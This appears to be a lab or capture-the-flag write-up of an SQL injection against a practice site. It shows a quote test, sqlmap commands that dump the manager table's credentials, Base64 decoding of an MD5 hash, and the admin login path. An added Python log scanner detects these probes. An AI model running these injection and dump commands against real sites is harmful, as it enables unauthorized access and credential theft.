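1. Finding the injection point on the target site (lab target exercise)
Look for an injection point by clicking on an article at random.
URL: http://117.167.136.244:28026/index/narticle.php?nid=3099
SQL injection test: http://117.167.136.244:28026/index/narticle.php?nid=3099'
An injection is confirmed to exist.
2. Using sqlmap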
- sqlmap -u "http://117.167.136.244:28026/index/narticle.php?nid=3094" --dbs
- sqlmap -u "http://117.167.136.244:28026/index/narticle.php?nid=3094" -D rjxy --tables
- sqlmap -u "http://117.167.136.244:28026/index/narticle.php?nid=3094" -D rjxy -T manager --columns
- sqlmap -u "http://117.167.136.244:28026/index/narticle.php?nid=3094" -D rjxy -T manager -C password,username,uid --dump
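Seen from the defender's side, the quote test in section 1 and the sqlmap runs above both leave traces in the web server's access log. The following is an added example, not part of the original write-up, that scans combined-format log lines for them; the log lines, client addresses, sqlmap version string and the function name findings are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format). Client addresses and the
# sqlmap version string are made-up sample values.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index/narticle.php?nid=3099 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index/narticle.php?nid=3099%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:01:30 +0000] "GET /index/narticle.php?nid=3094 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.20 - - [01/Jan/2024:10:02:00 +0000] "GET /index/narticle.php?nid=3094 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def findings(log_text, path="/index/narticle.php", param="nid"):
    """Return (client_ip, reason, evidence) for suspicious requests to `path`."""
    out = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        if url.path != path:
            continue
        # parse_qsl percent-decodes, so %27 is compared as a literal quote.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            # The article id is expected to be an integer; anything else is a probe
            # or a bug, and is also what the application itself should reject.
            if key == param and not re.fullmatch(r"[0-9]+", value):
                out.append((m["ip"], "non-numeric " + param, value))
        # sqlmap identifies itself in the User-Agent unless told otherwise, so
        # this is a cheap signal but not a reliable one on its own.
        if "sqlmap" in m["ua"].lower():
            out.append((m["ip"], "sqlmap user-agent", m["ua"]))
    return out

if __name__ == "__main__":
    for ip, reason, evidence in findings(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{evidence!r}")
```

The same digits-only check belongs in the application itself, together with a parameterized query, so that the value of nid never reaches the SQL text.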
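3. Cracking the password
The password is encrypted:
ZGM2M2VlMmUyYTE2M2Q0NmE3MGFiNDRhNzUxYzBkMjA=
Guessing that it is Base64-encoded, decoding gives:
dc63ee2e2a163d46a70ab44a751c0d20
It has 32 letters and digits in total, so it is presumably an MD5 hash.
4. Logging in to the admin back end
Visit http://117.167.136.244:28026/robots.txt
http://117.167.136.244:28026/admins/login.php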